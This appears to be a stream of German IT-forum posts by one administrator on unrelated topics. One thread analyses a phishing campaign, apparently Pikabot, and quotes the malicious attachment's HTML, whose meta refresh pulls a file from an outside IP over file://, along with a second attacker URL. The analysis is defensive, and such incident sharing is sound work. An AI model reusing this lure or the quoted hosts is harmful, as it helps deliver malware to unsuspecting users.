zahni

Es sieht danach aus:

https://gbhackers.com/pikabot-edr-evasion/

Wobei immer noch nicht klar ist, wozu die Binäre-Datei gut ist und warum ein Browser die TXT-Datei ausführen sollte,

vor 17 Minuten schrieb NorbertFe:

Aber der User sollte also in der Lage gewesen sein, anhand dieser Info klar zu erkennen, dass die Mail eben nicht von euch ist, oder?

Ja, die haben es ja an unsere IT-Sicherheit gemeldet. Wir haben dann noch den Applocker...

Ich halte es übrigens für wichtig, dass man die TXT-Datei per IP-Adresse abruft. Gut möglich, dass genau hier eine Zonen-Prüfung fehlschlägt (Sicherheitslücke).

PS: Eben wieder so eine Mail. Diesmal hat der Virenscanner auf unserem SMTP-Gateway zugeschlagen.

Hier noch eine andere URL (falls die andere down ist):

file://103.124.104.22/   zjxb/bO.txt

vor 6 Minuten schrieb NorbertFe:

Wie sieht in so einem Fall denn der Sender usw. aus?

Habe leider keine Header. In den weitergeleiteten Mails der MA steht

Von: ***** <NQuigley@bluecall.org> Von: **** <HDare@otbforged.com>

Hi,

bei uns ist jetzt mehrfach sowas aufgeschlagen:

Mail, die vorgibt aus unserem Haus zu sein (mit sehr alter Signatur, usw,.)

Ein ZIP-Anhang mit einer HTML-Datei, und eine Binär-Datei (sieht verschlüsselt aus), Dateiname ein Buchstabe.

In der HTML-Datei steht als Beispiel:

<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <title>Unsere-Domäne.de</title>
</head>
<body>

  <meta http-equiv="Refresh" content="0; url='file://204.44.125.68/  mcqef/yPXpC.txt'" />

  <div>Voluptas dolores animi nisi qui placeat cumque minima minus. Dolorem aut est dolor dolorem qui. Nihil consequatur eligendi molestiae sunt consequatur ut laboriosam quia. Aut in suscipit suunt tempora.</div>

</body>
</html>

 (Leerzeichen von mir).

Idee, wie das funktionieren soll? Oder wird eine Sicherheitslücke im Browser ausgenutzt? Ziel ist natürlich Binärfilter im Proxy und Mail auszutricksen.

Wir hatten am Ende 8.5.xx. Noch unter dem IBM-Namen. Der Verkauf ist mir bekannt. Eigentlich ist es immer noch eine Alternative zu Exchange. Der Webclient wurde schon damals groß ausgebaut. 

Wir gehen aber lieber in Cloud....

vor 2 Minuten schrieb Squire:

die Lotus Mail DB des Users immer auf den Client repliziert wurde

Die Version kam l.t. Google 1997 raus. Da war MS immer noch im Experimental-Status. Alle Datenbanken bei Notes/Domino kann man natürlich auch lokal replizieren. Damals hat das auch Sinn gemacht (verfügbare Serverhardware, etc). Bei uns wurde Notes zuletzt nur vom Server genutzt. Domino/Notes hatten damals eher Probleme, wenn mehr 100.000 Einträge einer NSF-Datenbank waren. Hier konnten Die User sich dann ein lokales Archiv konfigurieren.

Aber Exchange hat ja auch so seine Probleme mit zu vielen Mails in einer Datenbank. Was HCL aus dem Produkt aktuell gemacht hat und wer es noch nutzt: Keine Ahnung.

vor 1 Minute schrieb Nobbyaushb:

Oder haben die an den NB ebel mal keinen Intenet-Zugang, also Offline?

Die Lösung ist im Moment so. In  der Fa. am LAN mit lokalen Ressourcen, zu Hause per VDI. Wir haben auch noch Entwickler usw. Teilweise gibt es auf den NB auch noch Anwendungen, die wir von der VDI fernhalten wollen oder müssen. Mal wegen Aktivierungs-Gedöns und mal auch wegen der Größe es Images. Aber wir entwickeln uns, im Gegensatz zu Exchange, immer weiter... 

vor 4 Minuten schrieb Nobbyaushb:

/OT:
Aber das weißt du alles selber OT/

Auch OT: Jo, stand irgendwo. Die Netapp hat sich aber bisher nicht beschwert und Outlook hat uns nicht verpetzt. Generell geht die Welt nicht unter, wenn des die OST's zerlegt. Dann wird es gelöscht und der User darf Kaffee trinken gehen. Das wäre auch alles nicht nötig, wenn Exchange nicht so ein lahmes Konstrukt wäre. Das Ding soll nur Mails speichern und Kalender führen. Das konnte schon Lotus Domino ohne "Cache Mode" wesentlich performanter.

HI,

habe ich befürchtet. Dann müssen die User eben damit leben. Wir werden nochmal informieren, dass man Outlook nur 1x starten soll.

Hi,

wir versuchen gerade den Cached Mode auszurollen, da es Performance-Probleme im Exchange-Cluster gibt, die sich in einer Hybrid-Konfig noch verstärken (k.a. warum).

Die Cache-Datei liegt per UNC auf einer Netzressource, die der User normalerweise nicht erreicht. Grund ist hier die VDI-Umgebung, die keine persistenten lokalen Ressourcen bereitstellt und der alternativen Nutzung einen Notebooks, wenn man in der Fa. ist.

Jedenfalls funktioniert es. Allerdings scheinen sich User z.T. mehrfach anzumelden, z.B. wenn sie in einer Besprechung sind.

Kann man Outlook irgendwie mitteilen eine FM anzuzeigen, wenn die OST-Datei gelockt ist, anstatt eine neue Datei anzulegen und wieder alle Mails des Zeitraums vom Exchange herunterzuladen?

Danke im Voraus.

Mami, warum hatte ich einen Home-Server zu Hause und habe ihn irgendwann zum Inhaber einen Leitungsposition auf dem Dachboden befördert?

vor 2 Stunden schrieb Gu4rdi4n:

 

Die NT5DS wird in der GPO bereits geliefert

 

Was ich halt nicht verstehe ist, warum lässt sich ADSRV nicht auf den ADSRV3 umstellen, so wie der ADSRV2?

bearbeitet vor 51 Minuten von Gu4rdi4n

Weil es egal ist. Leider kann ich auch nicht sagen, woran  das festgemacht wird. Vermutlich ist es aber AD-Standortbezogen.

Einfach als TYPE NT5DS  eintragen und fertig. Wie bei jedem anderen Client.

In einer Domäne braucht nur (!) der PDC-Emulator eine externe Zeitquelle.

Neustart des Dienstes nicht vergessen.

Für angeschlossene Finanzinstitute gibt es https://www.s-cert.de/ 

Nicht getestet: https://www.opencve.io/welcome

Der Bund hat was für Bundesbehörden.

vor 14 Minuten schrieb NilsK:

arbeitsrechtlich

"aufsichtsrechtlicher"  Die Kolleginnen und Kollegen mit Bank-IT-Erfahrung wissen was ich meine.

Schlangenöl bringt nichts, aber alle sind glücklich, wenn man es hat. 

vor 18 Minuten schrieb Userle:

Wäre der Defender da ausreichend?

Vermutlich. Ich wurde aber sicherstellen, dass die Lösung zentral verwaltet werden kann und Alarme auch zentral auflaufen.

Ich bin bei dem Produkt eine Weile raus. Vermutlich braucht den SCCM:

https://learn.microsoft.com/de-de/mem/configmgr/protect/deploy-use/defender-advanced-threat-protection

Rein aus technischer Sicht halte ich das auf DCs für überflüssig, wenn ein DC ist und sonst nichts. 

Warum? Ein Virenscanner durchsucht Dateien nach bekannten Viren. Die müsste dort also jemand einschleusen und zur Ausführung bringen.

Das Einschleusen geht nur über Sicherheitslücken (auch im AV-Scanner) oder dem Erlangen von Zugangsberechtigungen mit erhöhten Rechten.

Im 2. Fall hat man eh verloren und im 1. Fall müssten die bösen Buben einen Virus benutzen, der dem Scanner schon bekannt ist. Eher unwahrscheinlich.

Und wenn man dann zusätzlich noch Ausnahmen definiert, kann man es auch lassen.,

Virenscanner im Dateisystem halte ich heute für vernachlässigbar, mal von Geräten abgesehen, die Wechseldatenträger benutzen (dürfen). Wichtiger ist ein Perimeter-Schutz, also Mail / Internetzugang (Proxy mit SSL interception!): Virenscanner und ein wirksamer Filter für ausführbare Dateien und Makros. Auf den Clients ist der Applocker / SRP zu verwenden (Ausführung nur an Orten, wo der User keine Schreibrechte hat).

Maximal ein Fullscan mit frischen Signaturen kann vielleicht nachträglich einen Befall oder einen Virus finden, der durch andere Maßnahmen nicht ausgeführt wurde,

Aus aufsichtsrechtlicher Sicht: Überall einen Virenscanner, sonst kann man keinen Haken auf der Liste machen.

 Virenscanner waren zu Zeiten als der Datenaustausch primär über Datenträger erfolgte noch sinnvoll. Seit jeder PC irgendwie am Internet hängt, bringt der auf dem PC relativ wenig, Meist hat man auch noch Fehlalarmen und Sicherheitslücken zu kämpfen,

Es sollte auch jetzt noch möglich sein, PDF-Datei aus Edge mit dem Acrobat Reader zu öffnen. Da gibt es irgendwo GPO bzw. Einstellungen für.

Ist schon die neue PDF-Erweiterung von Acrobat aktiv?

https://www.borncity.com/blog/2023/02/09/microsoft-edge-bekommt-microsoft-implementiert-adobe-acrobat-als-pdf-reader/

Man erkennt dies an dem Adobe-Logo unten rechts im internen PDF-Viewer.

Falls es das alte Plugin ist, mal edge://flags/#edge-new-pdf-viewer  öffnen und einschalten. Hier müsste es auch eine GPO geben...

Mich irritiert "DNS/dc3.". Prüfe mal auf DC3, ob da der SPN wirklich ohne FQDN eingetragen ist und ob es dort überhaupt einen DNS-SPN gibt.

vor 1 Stunde schrieb Gu4rdi4n:

Switche sind Unifi Aggregation und die 48 Port POE

Da musst Du dann die Doku lesen oder einen DL fragen.

Sind Client und Server gleich schnell angebunden? Ansonsten kann es bei billigen Switchen passieren, dass der Server die Daten zu schnell sendet. Dann gehen auf der Empfangsseite Pakete verloren. Sieht man wunderbar im Wireshark. Switche sollten hier Ethernet Flow Control einschalten und in den NIC-Konfigs sollte es ausgeschaltet sein.

Man kann nur eine MSI und eine APP-V Version zusammen installieren. 

vor 16 Minuten schrieb Nobbyaushb:

Wenn ich den TO richtig verstanden habe, verwenden die (noch) kein O365 sondern On-Premises

 

Es kann ja auch irgendein krudes NAS sein... Aber Excel gemeinsam bearbeiten ist keine so gute Idee. Viellicht kann Access als Backend nehmen, wenn Daten eingeben werden? Und ein SQL-Server wäre natürlich noch besser.

vor 6 Minuten schrieb NilsK:

Moin

das ist in dem Fall ja auch nicht gewünscht, sonst kann man ja nicht gemeinsam am selben Dokument arbeiten.

 

 

Nicht ganz. Locking kann auch dazu verwendet werden, um Bereichssperren zu setzen. Wobei es bei gezippten Excel-Dateien tatsächlich etwas schwierig wird.

Wenn ich es richtig lese, muss der (SMB) Client die Sperrmodus beim Öffnen schon setzen, sonst können Andere nicht darum zugreifen:

https://learn.microsoft.com/de-de/rest/api/storageservices/managing-file-locks

Auch welcher Art von Netzlaufwerk liegt die Datei? Cloud-Laufwerke bei MS unterstützen keine Locking-Mechanismen.